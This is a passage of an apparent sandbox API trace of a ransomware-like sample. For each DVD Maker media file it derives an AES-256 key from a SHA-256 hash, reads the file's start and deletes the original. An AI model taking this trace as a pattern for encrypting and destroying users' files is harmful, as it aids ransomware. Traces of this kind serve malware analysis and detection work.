Maker\\Shared\\DvdStyles\\Performance\\performance.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\performance.png")) returned 0 [0143.425] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.425] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.425] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.425] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.425] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1b0a [0143.425] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.431] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.431] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.431] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.432] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\perf_scenes_mask1.png")) returned 0 [0143.433] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.433] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.433] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.433] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.433] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x135f [0143.433] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.436] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.436] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.436] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.437] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\perf_scenes_subpicture1.png")) returned 0 [0143.438] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.438] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.438] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.438] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.438] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1197 [0143.438] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.441] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.441] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.441] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.443] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttonicon.png")) returned 0 [0143.443] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.444] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.444] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.444] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.444] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc0a [0143.444] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.446] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.446] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.446] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.448] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttoniconsubpi.png")) returned 0 [0143.448] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.449] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.449] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.449] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.449] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc24 [0143.449] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.451] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.451] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.451] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.452] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\redmenu.png")) returned 0 [0143.453] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.453] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.453] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.453] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.453] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8232c [0143.453] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.485] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.485] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.485] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.486] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\scene_loop.wmv")) returned 0 [0143.486] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.487] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.487] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.487] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.487] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x95bac [0143.487] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.530] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.530] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.530] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.531] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\scene_loop_pal.wmv")) returned 0 [0143.532] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.533] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.533] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.533] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.533] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x99 [0143.533] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.534] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.534] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.534] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.535] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonicon.png")) returned 0 [0143.539] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.540] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.540] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.540] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.540] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x84 [0143.540] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.542] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.542] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.542] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.544] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonsubpicture.png")) returned 0 [0143.545] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.545] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.545] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.545] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.545] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1a9204 [0143.545] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.665] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.665] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.665] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.667] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv")) returned 0 [0143.668] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.668] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.668] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.668] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.668] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1d0304 [0143.669] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.800] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.800] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.800] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.802] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv")) returned 0 [0143.806] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.806] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.806] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.806] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.806] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xad264 [0143.806] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.849] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0143.849] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.849] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.850] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes.wmv")) returned 0 [0143.851] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.851] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.851] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.851] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.852] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb4f64 [0143.852] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0143.931] CryptDestroyHash (hHash=0x284d528) returned 1 [0143.931] CryptDestroyKey (hKey=0x284d568) returned 1 [0143.931] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0143.932] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes_pal.wmv")) returned 0 [0143.932] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0143.933] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0143.933] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.933] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0143.933] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x999e4 [0143.933] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.169] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0144.169] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.169] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.171] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_scene.wmv")) returned 0 [0144.172] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.173] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.173] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.173] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.173] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa16e4 [0144.173] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.227] CryptDestroyHash (hHash=0x284d528) returned 1 [0144.228] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.228] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.229] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_scene_pal.wmv")) returned 0 [0144.230] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.230] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.230] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.230] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.231] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1a3c [0144.231] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.235] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0144.235] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.235] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.236] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\usercontent_16x9_imagemask.png")) returned 0 [0144.237] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.238] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.238] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.238] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.238] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ee8 [0144.238] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.241] CryptDestroyHash (hHash=0x284d528) returned 1 [0144.241] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.241] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.243] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\whitemenu.png")) returned 0 [0144.244] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0144.245] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.245] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.245] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.245] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0144.245] GetFileSize (in: hFile=0x438, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39eaa [0144.245] ReadFile (in: hFile=0x438, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0144.274] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0144.274] CryptDestroyKey (hKey=0x284d568) returned 1 [0144.274] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0144.277] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_intro_bg.wmv")) returned 0 [0144.291] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0144.291] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0144.291] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.291] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 